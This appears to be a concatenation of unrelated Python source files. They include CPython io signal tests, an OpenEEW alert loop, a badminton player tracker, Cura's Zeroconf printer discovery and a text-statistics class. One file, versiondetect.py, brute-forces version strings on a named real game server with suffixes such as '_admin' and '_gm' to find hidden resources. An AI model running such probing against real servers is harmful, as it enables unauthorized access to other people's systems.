# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
    def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
    def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = [None]
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
error[0] = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error[0])
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
    def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
    def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
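    # For example (illustrative, not part of the original): after this loop
    # CMiscIOTest.open is io.open and CMiscIOTest.BlockingIOError is
    # io.BlockingIOError, while PyMiscIOTest.open is pyio.OpenWrapper and
    # PyMiscIOTest.MockRawIO is the Py-prefixed mock class, so each test
    # class exercises exactly one implementation.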
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
main.py | """
This is the main file that runs the OpenEEW code package
"""
from threading import Thread
from params import params
from src import receive_topic, data_holders, ibm_topic
def main():
"""Does everything"""
# Create a Detections DataFrame.
detections = data_holders.Detections()
# Create a Events DataFrame.
events = data_holders.Events()
# We create and start receive detection worker
detection_rec = receive_topic.ReceiveTopic(
topic_list=detections, topic="detection", params=params
)
det_rec_process = Thread(target=detection_rec.run)
det_rec_process.start()
# We create and start receive event worker
event_rec = receive_topic.ReceiveTopic(
topic_list=events, topic="event", params=params
)
ev_rec_process = Thread(target=event_rec.run)
ev_rec_process.start()
# We create and start publish detection worker
detection_send = ibm_topic.Topic2IBM(
topic_list=detections, topic="detection", params=params
)
det_send_process = Thread(target=detection_send.run)
det_send_process.start()
# We create and start publish event worker
event_send = ibm_topic.Topic2IBM(topic_list=events, topic="event", params=params)
ev_send_process = Thread(target=event_send.run)
ev_send_process.start()
# We join our Threads, i.e. we wait for them to finish before continuing
det_rec_process.join()
ev_rec_process.join()
det_send_process.join()
ev_send_process.join()
if __name__ == "__main__":
main()
|
object_tracker_edit.py | import time, random
import numpy as np
from absl import app, flags, logging
from absl.flags import FLAGS
import cv2
import matplotlib.pyplot as plt
import tensorflow as tf
from yolov3_tf2.models import (
    YoloV3,
    YoloV3Tiny
)
from yolov3_tf2.dataset import transform_images
from yolov3_tf2.utils import draw_outputs, convert_boxes
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
# from PIL import Image
from player import *
import threading
from tkinter import *
import time
import queue
##################################################################################################################
# Global variables; these could be moved to a database in a production setup
lcw = "Lee Chong Wei"
swh = "Son Wan Ho"
lyd = "Lee Yong Dae"
kgj = "Kim Gi Jung"
ksh = "Ko Sung Hyun"
yys = "Yo Yeon Seong"
csg = "Choi Sol Gyu"
wcl = "Wang Chi-Lin"
chl = "Chen Hung-Lin"
lcw_height = 1.72
swh_height = 1.77
lyd_height = 1.76
kkj_height = 1.79
ksh_height = 1.79
yys_height = 1.81
csg_height = 1.81
wcl_height = 1.86
chl_height = 1.77
##################################################################################################################
player_names1 = ["Player 1",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names2 = ["Player 2",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names3 = ["Player 3",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names4 = ["Player 4",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_names5 = ["Player 4",lcw,swh,lyd,kgj,ksh,yys,csg,wcl,chl]
player_heights = [lcw_height,swh_height,lyd_height,kkj_height,ksh_height,yys_height,csg_height]
##################################################################################################################
q = queue.Queue()
print("If no player is present, please at least select None")
def submit():
global name_1,name_2,name_3,name_4,name_5,height_1,height_2,height_3,height_4,height_5
name_1 = clicked1.get()
name_2 = clicked2.get()
name_3 = clicked3.get()
name_4 = clicked4.get()
name_5 = clicked5.get()
height_1 = playercheck(name_1)
height_2 = playercheck(name_2)
height_3 = playercheck(name_3)
height_4 = playercheck(name_4)
height_5 = playercheck(name_5)
# print(name_1,height_1,name_2,height_2,name_3,height_3,name_4,height_4,name_5,height_5)
return(name_1,height_1,name_2,height_2,name_3,height_3,name_4,height_4,name_5,height_5)
def playercheck(selection):
if selection == "Lee Chong Wei":
return lcw_height
elif selection == "Son Wan Ho":
return swh_height
elif selection == "Lee Yong Dae":
        return lyd_height
elif selection == "Kim Gi Jung":
return kkj_height
elif selection == "Ko Sung Hyun":
return ksh_height
elif selection == "Yo Yeon Seong":
return yys_height
elif selection == "Choi Sol Gyu":
return csg_height
elif selection == "Wang Chi-Lin":
return wcl_height
elif selection == "Chen Hung-Lin":
return chl_height
elif "None" or "Select Player" or "Player 1" or "Player 2" or "Player 3" or "Player 4":
return 1
else:
return 1
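# A more compact alternative (hypothetical sketch, not used by the code above):
# keep the name-to-height mapping in a dict and fall back to 1 for the
# "None"/"Select Player"/"Player <n>" entries, e.g.
#   PLAYER_HEIGHTS = {lcw: lcw_height, swh: swh_height, lyd: lyd_height,
#                     kgj: kkj_height, ksh: ksh_height, yys: yys_height,
#                     csg: csg_height, wcl: wcl_height, chl: chl_height}
#   def playercheck(selection):
#       return PLAYER_HEIGHTS.get(selection, 1)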
def playerselection():
window = Tk()
window.geometry('400x400')
window.title("Player Selection")
label1 = Label(window, text="Player 1: ")
label1.config(width=10, font=('Helvetica', 10))
label2 = Label(window, text="Player 2: ")
label2.config(width=10, font=('Helvetica', 10))
label3 = Label(window, text="Player 3: ")
label3.config(width=10, font=('Helvetica', 10))
label4 = Label(window, text="Player 4: ")
label4.config(width=10, font=('Helvetica', 10))
label5 = Label(window, text="If no player is present, please")
label6 = Label(window, text="at least select Player<Num>")
global label7, clicked1, clicked2, clicked3, clicked4, clicked5
label7 = Label(window, text="Test")
label7.config(width=10, font=('Helvetica', 10))
label1.grid(row=0,column=0)
label2.grid(row=1,column=0)
label3.grid(row=2,column=0)
label4.grid(row=3,column=0)
label5.grid(row=5,column=0)
label6.grid(row=5,column=1)
label7.grid(row=4,column=0)
clicked1 = StringVar()
clicked1.set("Select Player")
clicked2 = StringVar()
clicked2.set("Select Player")
clicked3 = StringVar()
clicked3.set("Select Player")
clicked4 = StringVar()
clicked4.set("Select Player")
clicked5 = StringVar()
clicked5.set("Select Player")
drop1 = OptionMenu(window, clicked1, *player_names1)
drop1.config(width=20, font=('Helvetica', 10))
drop2 = OptionMenu(window, clicked2, *player_names2)
drop2.config(width=20, font=('Helvetica', 10))
drop3 = OptionMenu(window, clicked3, *player_names3)
drop3.config(width=20, font=('Helvetica', 10))
drop4 = OptionMenu(window, clicked4, *player_names4)
drop4.config(width=20, font=('Helvetica', 10))
drop5 = OptionMenu(window, clicked5, *player_names5)
drop5.config(width=20, font=('Helvetica', 10))
drop1.grid(row=0,column=1)
drop2.grid(row=1,column=1)
drop3.grid(row=2,column=1)
drop4.grid(row=3,column=1)
drop5.grid(row=4,column=1)
labelTest1 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest1.grid(row=4,column=1)
labelTest2 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest2.grid(row=5,column=1)
labelTest3 = Label(text="", font=('Helvetica', 8 ), fg='red')
labelTest3.grid(row=6,column=1)
labelTest4 = Label(text="", font=('Helvetica', 8), fg='red')
labelTest4.grid(row=7,column=1)
window.mainloop()
##################################################################################################################
flags.DEFINE_string('classes', './data/labels/coco.names', 'path to classes file')
flags.DEFINE_string('weights', './weights/yolov3.tf',
'path to weights file')
flags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_string('video', './data/video/test.mp4',
                    'path to video file or number for webcam')
flags.DEFINE_string('output', None, 'path to output video')
flags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_integer('num_classes', 80, 'number of classes in the model')
##################################################################################################################
def main(_argv):
# Definition of the parameters
max_cosine_distance = 0.5
nn_budget = None
nms_max_overlap = 1.0
#initialize deep sort
model_filename = 'model_data/mars-small128.pb'
encoder = gdet.create_box_encoder(model_filename, batch_size=1)
metric = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
tracker = Tracker(metric)
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
if FLAGS.tiny:
yolo = YoloV3Tiny(classes=FLAGS.num_classes)
else:
yolo = YoloV3(classes=FLAGS.num_classes)
yolo.load_weights(FLAGS.weights)
logging.info('weights loaded')
class_names = [c.strip() for c in open(FLAGS.classes).readlines()]
logging.info('classes loaded')
try:
vid = cv2.VideoCapture(int(FLAGS.video))
except:
vid = cv2.VideoCapture(FLAGS.video)
out = None
if FLAGS.output:
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)
out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))
list_file = open('detection.txt', 'w')
frame_index = -1
fps = 0.0
count = 0
while True:
        _, img = vid.read()
        # Guard against failed reads / end of the stream (uses the otherwise
        # unused count variable); stop after a few empty frames.
        if img is None:
            logging.warning('Empty frame')
            count += 1
            if count < 3:
                continue
            break
img_in = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_in = tf.expand_dims(img_in, 0)
img_in = transform_images(img_in, FLAGS.size)
t1 = time.time()
boxes, scores, classes, nums = yolo.predict(img_in)
classes = classes[0]
names = []
for i in range(len(classes)):
names.append(class_names[int(classes[i])])
names = np.array(names)
converted_boxes = convert_boxes(img, boxes[0])
features = encoder(img, converted_boxes)
detections = [Detection(bbox, score, class_name, feature) for bbox, score, class_name, feature in zip(converted_boxes, scores[0], names, features)]
#initialize color map
cmap = plt.get_cmap('tab20b')
colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]
        # run non-maxima suppression
boxs = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
classes = np.array([d.class_name for d in detections])
indices = preprocessing.non_max_suppression(boxs, classes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# Call the tracker
tracker.predict()
tracker.update(detections)
for track in tracker.tracks:
if not track.is_confirmed() or track.time_since_update > 1:
continue
submit()
bbox = track.to_tlbr()
class_name = track.get_class()
color = colors[int(track.track_id) % len(colors)]
color = [i * 255 for i in color]
cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), color, 1)
cv2.rectangle(img, (int(bbox[0]), int(bbox[1]-30)), (int(bbox[0])+(len(class_name)+len(str(track.track_id)))*17, int(bbox[1])), color, -1)
# if name_1 == "Select Player" or name_2 == "Select Player" or name_3 == "Select Player" or name_4 == "Select Player" or name_5 == "Select Player" or height_1 == NameError or height_2 == NameError or height_3 == NameError or height_4 == NameError or height_5 == NameError:
# cv2.putText(img, class_name + "-" + str(track.track_id),(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
if class_name+str(track.track_id) == "Player1":
cv2.putText(img, name_1 ,(int(bbox[0]), int(bbox[1]-10)),0, 0.75, (255,255,255),2)
# print("1: ", int(bbox[3]))
s_height0 = ((int(bbox[3])-(int(bbox[1])))/height_1)*1.15
new_height_player1 = int(int(bbox[3])-int(s_height0))
cv2.line(img, (int(bbox[0]), int(new_height_player1)), (int(bbox[2]), int(new_height_player1)), (0,255,0), 2)
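                # Worked example (illustrative values): a 300 px tall bounding
                # box for a 1.72 m player gives 300/1.72 ~= 174 px per metre;
                # times 1.15 that is ~200 px, so the green line is drawn about
                # 200 px (roughly 1.15 m in image scale) above the box bottom.
                # The 1.15 factor appears to be an empirical correction.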
if class_name+str(track.track_id) == "Player2":
cv2.putText(img, name_2,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height1 = ((int(bbox[3])-(int(bbox[1])))/height_2)*1.15
new_height_player2 = int(int(bbox[3])-int(s_height1))
cv2.line(img, (int(bbox[0]), int(new_height_player2)), (int(bbox[2]), int(new_height_player2)), (0,255,0), 2)
if class_name+str(track.track_id) == "Player3":
cv2.putText(img, name_3,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height2 = ((int(bbox[3])-(int(bbox[1])))/height_3)*1.15
new_height_player3 = int(int(bbox[3])-int(s_height2))
cv2.line(img, (int(bbox[0]), int(new_height_player3)), (int(bbox[2]), int(new_height_player3)), (0,255,0), 2)
if class_name+str(track.track_id) == "Player4":
cv2.putText(img, name_4,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height3 = ((int(bbox[3])-(int(bbox[1])))/height_4)*1.15
new_height_player4 = int(int(bbox[3])-int(s_height3))
cv2.line(img, (int(bbox[0]), int(new_height_player4)), (int(bbox[2]), int(new_height_player4)), (0,255,0), 2)
if class_name+str(track.track_id) not in {'Player1','Player2','Player3','Player4'}:
label7.configure(text=class_name+str(track.track_id))
if class_name+str(track.track_id) == "Player"+str(track.track_id):
cv2.putText(img, name_5,(int(bbox[0]), int(bbox[1])),0, 0.75, (255,255,255),2)
# print("2: ", int(bbox[3]))
s_height4 = ((int(bbox[3])-(int(bbox[1])))/height_5)*1.15
new_height_player5 = int(int(bbox[3])-int(s_height4))
cv2.line(img, (int(bbox[0]), int(new_height_player5)), (int(bbox[2]), int(new_height_player5)), (0,255,0), 2)
### UNCOMMENT BELOW IF YOU WANT CONSTANTLY CHANGING YOLO DETECTIONS TO BE SHOWN ON SCREEN
#for det in detections:
# bbox = det.to_tlbr()
# cv2.rectangle(img,(int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),(255,0,0), 2)
# print fps on screen
fps = ( fps + (1./(time.time()-t1)) ) / 2
cv2.putText(img, "FPS: {:.2f}".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
cv2.imshow('output', img)
if FLAGS.output:
out.write(img)
frame_index = frame_index + 1
list_file.write(str(frame_index)+' ')
if len(converted_boxes) != 0:
for i in range(0,len(converted_boxes)):
list_file.write(str(converted_boxes[i][0]) + ' '+str(converted_boxes[i][1]) + ' '+str(converted_boxes[i][2]) + ' '+str(converted_boxes[i][3]) + ' ')
list_file.write('\n')
# press q to quit
if cv2.waitKey(1) == ord('q'):
break
vid.release()
if FLAGS.output:
out.release()
list_file.close()
cv2.destroyAllWindows()
if __name__ == '__main__':
try:
x = threading.Thread(target=playerselection)
x.start()
        # Pass the callable and its argument; calling app.run(main) directly
        # here would block before the thread is even created.
        y = threading.Thread(target=app.run, args=(main,))
y.start()
# app.run(main)
except SystemExit:
pass
|
ZeroConfClient.py | # Copyright (c) 2019 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.
from queue import Queue
from threading import Thread, Event
from time import time
from typing import Optional
from zeroconf import Zeroconf, ServiceBrowser, ServiceStateChange, ServiceInfo
from UM.Logger import Logger
from UM.Signal import Signal
from cura.CuraApplication import CuraApplication
## The ZeroConfClient handles all network discovery logic.
# It emits signals when new network services were found or disappeared.
class ZeroConfClient:
# The discovery protocol name for Ultimaker printers.
ZERO_CONF_NAME = u"_ultimaker._tcp.local."
# Signals emitted when new services were discovered or removed on the network.
addedNetworkCluster = Signal()
removedNetworkCluster = Signal()
def __init__(self) -> None:
self._zero_conf = None # type: Optional[Zeroconf]
self._zero_conf_browser = None # type: Optional[ServiceBrowser]
self._service_changed_request_queue = None # type: Optional[Queue]
self._service_changed_request_event = None # type: Optional[Event]
self._service_changed_request_thread = None # type: Optional[Thread]
## The ZeroConf service changed requests are handled in a separate thread so we don't block the UI.
# We can also re-schedule the requests when they fail to get detailed service info.
    # Any new or re-scheduled requests will be appended to the request queue and the thread will process them.
def start(self) -> None:
self._service_changed_request_queue = Queue()
self._service_changed_request_event = Event()
try:
self._zero_conf = Zeroconf()
# CURA-6855 catch WinErrors
except OSError:
Logger.logException("e", "Failed to create zeroconf instance.")
return
self._service_changed_request_thread = Thread(target = self._handleOnServiceChangedRequests, daemon = True, name = "ZeroConfServiceChangedThread")
self._service_changed_request_thread.start()
self._zero_conf_browser = ServiceBrowser(self._zero_conf, self.ZERO_CONF_NAME, [self._queueService])
# Cleanup ZeroConf resources.
def stop(self) -> None:
if self._zero_conf is not None:
self._zero_conf.close()
self._zero_conf = None
if self._zero_conf_browser is not None:
self._zero_conf_browser.cancel()
self._zero_conf_browser = None
    ## Handles a change in discovered network services.
def _queueService(self, zeroconf: Zeroconf, service_type, name: str, state_change: ServiceStateChange) -> None:
item = (zeroconf, service_type, name, state_change)
if not self._service_changed_request_queue or not self._service_changed_request_event:
return
self._service_changed_request_queue.put(item)
self._service_changed_request_event.set()
## Callback for when a ZeroConf service has changes.
def _handleOnServiceChangedRequests(self) -> None:
if not self._service_changed_request_queue or not self._service_changed_request_event:
return
while True:
# Wait for the event to be set
self._service_changed_request_event.wait(timeout=5.0)
# Stop if the application is shutting down
if CuraApplication.getInstance().isShuttingDown():
return
self._service_changed_request_event.clear()
# Handle all pending requests
reschedule_requests = [] # A list of requests that have failed so later they will get re-scheduled
while not self._service_changed_request_queue.empty():
request = self._service_changed_request_queue.get()
zeroconf, service_type, name, state_change = request
try:
result = self._onServiceChanged(zeroconf, service_type, name, state_change)
if not result:
reschedule_requests.append(request)
except Exception:
Logger.logException("e", "Failed to get service info for [%s] [%s], the request will be rescheduled",
service_type, name)
reschedule_requests.append(request)
# Re-schedule the failed requests if any
if reschedule_requests:
for request in reschedule_requests:
self._service_changed_request_queue.put(request)
## Handler for zeroConf detection.
# Return True or False indicating if the process succeeded.
# Note that this function can take over 3 seconds to complete. Be careful calling it from the main thread.
def _onServiceChanged(self, zero_conf: Zeroconf, service_type: str, name: str, state_change: ServiceStateChange
) -> bool:
if state_change == ServiceStateChange.Added:
return self._onServiceAdded(zero_conf, service_type, name)
elif state_change == ServiceStateChange.Removed:
return self._onServiceRemoved(name)
return True
## Handler for when a ZeroConf service was added.
def _onServiceAdded(self, zero_conf: Zeroconf, service_type: str, name: str) -> bool:
# First try getting info from zero-conf cache
info = ServiceInfo(service_type, name, properties={})
for record in zero_conf.cache.entries_with_name(name.lower()):
info.update_record(zero_conf, time(), record)
for record in zero_conf.cache.entries_with_name(info.server):
info.update_record(zero_conf, time(), record)
if info.address:
break
# Request more data if info is not complete
if not info.address:
info = zero_conf.get_service_info(service_type, name)
if info:
type_of_device = info.properties.get(b"type", None)
if type_of_device:
if type_of_device == b"printer":
address = '.'.join(map(lambda n: str(n), info.address))
self.addedNetworkCluster.emit(str(name), address, info.properties)
else:
Logger.log("w", "The type of the found device is '%s', not 'printer'." % type_of_device)
else:
Logger.log("w", "Could not get information about %s" % name)
return False
return True
## Handler for when a ZeroConf service was removed.
def _onServiceRemoved(self, name: str) -> bool:
Logger.log("d", "ZeroConf service removed: %s" % name)
self.removedNetworkCluster.emit(str(name))
return True
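# Minimal usage sketch (illustrative only; this code does not ship with the
# class above and the callback names are hypothetical):
#   def on_added(name, address, properties):
#       Logger.log("d", "Found printer %s at %s" % (name, address))
#   client = ZeroConfClient()
#   client.addedNetworkCluster.connect(on_added)
#   client.start()   # begins browsing for _ultimaker._tcp.local. services
#   ...
#   client.stop()    # closes the Zeroconf instance and cancels the browser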
|
versiondetect.py | from http import client as httpsconn
import queue
import threading
import time
#import config
wf=open('./versions.txt',mode='w')
def write_version(s):
global wf
wf.write(s+'\n')
def trystr():
while True:
s=versions.get()
conn=httpsconn.HTTPSConnection('zjzksvr.xiimoon.com',port=443)
conn.connect()
url='/resource/get?version='+s
conn.request('GET',url)
resp=conn.getresponse()
data=resp.read()
#print(data)
if (r'"retcode":"0"') in str(data):
print(s)
write_version(s)
else:
continue
print('fail:',s)
def gen_version():
global versions
for v1 in range(0,15):
for v2 in range(0,15):
print('try:',v1,' ',v2)
for v3 in range(0,15):
for suffix in ('','_elite','_admin','_manage','_internal','_gm'):
versions.put(str(v1)+'.'+str(v2)+'.'+str(v3)+suffix)
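# For illustration: the generator above enqueues candidate strings such as
# "0.0.0", "0.0.0_elite", ..., "14.14.14_gm" -- 15*15*15*6 = 20250 versions in
# total -- which the trystr() workers then probe one by one.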
versions=queue.Queue(800)
threadlist=[]
threadlist.append(threading.Thread(target=gen_version))
for i in range(0,25):
threadlist.append(threading.Thread(target=trystr))
for item in threadlist:
item.start()
while threading.active_count()>1:  # >1 because the main thread itself always counts
time.sleep(1) |
stats_multi_proc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# : XXX{Information about this code}XXX
# Author:
# c(Developer) -> {'Egor Savin'}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###Programm Info######
#
#
#
#
#
import os
import sys
from raven import Client
import types
#import Queue
import enlighten
import json
from collections import defaultdict,Counter,OrderedDict
import copy
import threading
import time
from itertools import izip
import re
import Stemmer
import multiprocessing as mp
from multiprocessing import Value, Process, Manager,Pipe,Queue#, BaseManager, DictProxy
from ctypes import c_bool
import gc
#from multiprocessing import Queue
from zas_rep_tools.src.utils.helpers import intern_sender,DeepDict,MyMultiManager,set_class_mode, print_mode_name, path_to_zas_rep_tools, Rle, categorize_token_list, get_categories, instance_info, SharedCounterExtern, SharedCounterIntern, Status,function_name,statusesTstring, ngrams,nextLowest, get_number_of_streams_adjust_cpu,LenGen,DefaultOrderedDict, from_ISO639_2, to_ISO639_2,MyThread
from zas_rep_tools.src.classes.dbhandler import DBHandler
from zas_rep_tools.src.classes.reader import Reader
from zas_rep_tools.src.classes.corpus import Corpus
from zas_rep_tools.src.classes.exporter import Exporter
from zas_rep_tools.src.utils.zaslogger import ZASLogger
from zas_rep_tools.src.utils.debugger import p
from zas_rep_tools.src.utils.error_tracking import initialisation
from zas_rep_tools.src.utils.traceback_helpers import print_exc_plus
from zas_rep_tools.src.classes.basecontent import BaseContent, BaseDB
import zas_rep_tools.src.utils.db_helper as db_helper
from zas_rep_tools.src.utils.custom_exceptions import ZASCursorError, ZASConnectionError,DBHandlerError,ProcessError,ErrorInsertion,ThreadsCrash
#from sortedcontainers import SortedDict
import platform
if platform.uname()[0].lower() !="windows":
import colored_traceback
colored_traceback.add_hook()
else:
import colorama
class Stats(BaseContent,BaseDB):
phenomena_table_map = {
"repl":"replications",
"redu":"reduplications",
"baseline":"baseline",
}
supported_rep_type = set(("repl", "redu"))
supported_phanomena_to_export = supported_rep_type.union(set(("baseline",)))
supported_syntagma_type= set(("lexem", "pos"))
supported_sentiment = set(("negative","positive","neutral"))
output_tables_types = set(("sum", "exhausted"))
output_tables_col_names = {
"baseline":{
"all":"occur_syntagma_all",
"repl":{
"uniq":"occur_repl_uniq",
"exhausted":"occur_repl_exhausted",
},
"redu":{
"uniq":"occur_redu_uniq",
"exhausted":"occur_redu_exhausted",
}
}
}
min_col = {
"repl":('id','doc_id', "redufree_len",'index_in_corpus','index_in_redufree','normalized_word', 'stemmed',"in_redu"),
"redu":('id','doc_id', "redufree_len",'index_in_corpus', 'index_in_redufree',"redu_length",'normalized_word','stemmed'),
"baseline":["syntagma", "occur_syntagma_all", "scope",'stemmed'],
}
_non_pos_tags = set(["EMOIMG", "EMOASC", "number", "symbol", "hashtag", "mention","regular"])
header_order_to_export = ("baseline", "document", "word", "repl", "redu", "context")
def __init__(self, status_bar=True,log_ignored=True,**kwargs):
super(type(self), self).__init__(**kwargs)
#Input: Encapsulation:
self._status_bar = status_bar
self._log_ignored= log_ignored
#self._preprocession = preprocession
self.locker = threading.Lock()
#InstanceAttributes: Initialization
self.statsdb = False
self.corp = False
self._corp_info = False
self.corpdb_defaultname = "corpus"
self.attached_corpdb_name = False
self._doc_id_tag = db_helper.doc_id_tag
#self._baseline_delimiter = baseline_delimiter
#self._init_compution_variables()
#self.preprocessors = self.mgr.defaultdict(lambda: self.mgr.defaultdict(dict)
#self.preprocessors = self.mgr.DeepDict( self.mgr.CallableDict() )
#self.x = self.manager.list()
#self.mgr = MyMultiManager()
#self.mgr.start()
#self._init_preprocessors(thread_name="Thread0")
self._init_main_variables()
self.logger.debug('Intern InstanceAttributes was initialized')
self.logger.debug('An instance of Stats() was created ')
## Log Settings of the Instance
attr_to_flag = False
attr_to_len = False
self._log_settings(attr_to_flag =attr_to_flag,attr_to_len =attr_to_len)
############################################################
####################__init__end#############################
############################################################
def __del__(self):
super(type(self), self).__del__()
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################Extern########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
def _init_main_variables(self):
self.mgr = MyMultiManager()
self.mgr.start()
self.preprocessors = self.mgr.DeepDict( self.mgr.CallableDict() )
self._init_preprocessors(thread_name="Thread0")
def _init_compution_variables(self):
self._init_main_variables()
self.mgr = MyMultiManager()
self.mgr.start()
#p("-11")
self.threads_error_bucket = Queue()
self.threads_status_bucket = Queue()
self.threads_success_exit = []
self.threads_unsuccess_exit = []
self._threads_num = 0
#p("-222")
self.status_bars_manager = self._get_status_bars_manager()
#p("-333")
#p("-555")
#self.baseline_replication = defaultdict(lambda:defaultdict(lambda: 0) )
